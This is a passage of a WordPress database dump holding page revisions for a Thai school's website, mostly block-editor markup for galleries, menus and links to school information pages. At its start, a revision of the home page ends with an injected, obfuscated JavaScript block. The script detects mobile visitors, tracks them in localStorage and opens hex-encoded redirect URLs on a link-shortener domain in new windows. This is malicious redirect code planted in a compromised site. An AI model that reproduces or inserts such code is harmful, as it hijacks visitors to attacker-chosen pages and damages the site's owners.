)|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script></p>','หน้าแรก','','inherit','closed','closed','','14-revision-v1','','','2025-06-09 14:25:37','2025-06-09 07:25:37','',14,'http://pakhaeng.ssk.in.th/?p=1331',0,'revision','',0),
(1332,1,'2025-06-09 14:25:45','2025-06-09 07:25:45','<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_b8ea4f-02\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_235c2e-aa\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_235c2e-aa\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"67990d4f\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e53f332c\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingBottom\":\"10px\"}} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_1540af-66\",\"columns\":[1,1,1,1,1,1],\"thumbSize\":\"full\",\"ids\":[666,668],\"type\":\"carousel\",\"imageRatio\":\"land169\",\"autoPlay\":true,\"transSpeed\":1000,\"slidesScroll\":\"all\",\"arrowStyle\":\"none\",\"dotStyle\":\"light\",\"imagesDynamic\":[{\"id\":666,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=666\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก2-1.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก2-1.png\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก2-1.png\",\"width\":1600,\"height\":900},{\"id\":668,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=668\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก3.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก3.png\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก3.png\",\"width\":1600,\"height\":900}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"ff644ddb\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_f7576b-fd\",\"columns\":[4,4,4,3,2,2],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=484\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=476\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=563\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":30,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/ผอ-1.png\" alt=\"\" title=\"ผอ 1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"14_bc537f-5a\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns14_bc537f-5a\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"14_1da0eb-4e\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"link\":\"http://pakhaeng.ssk.in.th/?page_id=469\",\"sizePreset\":\"small\",\"background\":\"#0a71ad\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#0a71ad\",\"backgroundColorHover\":\"#8ed1fc\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"14_add57c-9d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items14_add57c-9d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"14_745a05-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_745a05-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=650\" data-type=\"page\" data-id=\"650\">ข้อมูลพื้นฐาน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_1e894c-db\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_1e894c-db\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=643\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_95f155-a6\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_95f155-a6\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=609\" data-type=\"page\" data-id=\"609\">ข้อมูลสิ่งก่อสร้าง</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_3cdb23-c1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_3cdb23-c1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=656\" data-type=\"page\" data-id=\"656\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_92a3d1-5f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_92a3d1-5f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">กรรมการสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_225b86-42\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_225b86-42\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=469\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_e92ee9-59\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_e92ee9-59\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=605\" data-type=\"page\" data-id=\"605\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_91c788-64\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_91c788-64\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=496\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=496\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e5e0c341\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":503,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image size-full\"><a href=\"http://eita.ssk.in.th/eit_admin.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/Is-It-a-Gift-Instagram-Post.png\" alt=\"\" class=\"wp-image-503\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1314,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image size-full\"><a href=\"http://eita.ssk.in.th/eit.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/1.png\" alt=\"\" class=\"wp-image-1314\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1315,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image size-full\"><a href=\"http://eita.ssk.in.th/eit_admin.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/2.png\" alt=\"\" class=\"wp-image-1315\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"9l7bo6vn\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"showTaxonomy\":false,\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"showPagination\":true,\"postsPerPage\":\"2\",\"headingText\":\"วิดีโอกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"headingHide\":false,\"category-terms\":[{\"label\":\"วิดีโอกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%a7%e0%b8%b4%e0%b8%94%e0%b8%b5%e0%b9%82%e0%b8%ad%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingBgColor\":\"#ff6900\"} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=546\">โครงสร้างและอำนาจหน้าที่</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=469\">ข้อมูลผู้บริหาร</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=362\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=362\">ข้อมูลการติดต่อ</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=355\" data-type=\"page\" data-id=\"355\">ข่าวประชาสัมพันธ์</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและการใช้จ่ายงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td>แผนกลยุทธ์หรือแผนพัฒนาคุณภาพการศึกษาของสถานศึกษา</td></tr><tr><td>แผนปฏิบัติการและความก้าวหน้าในการดำเนินงานและการใช้งบประมาณประจำปี</td></tr><tr><td>คู่มือหรือแนวทางปฏิบัติงานของครู และบุคลากรทางการศึกษา</td></tr><tr><td>ข้อมูลเชิงสถิติการให้บริการ</td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=459\">E-Service</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" 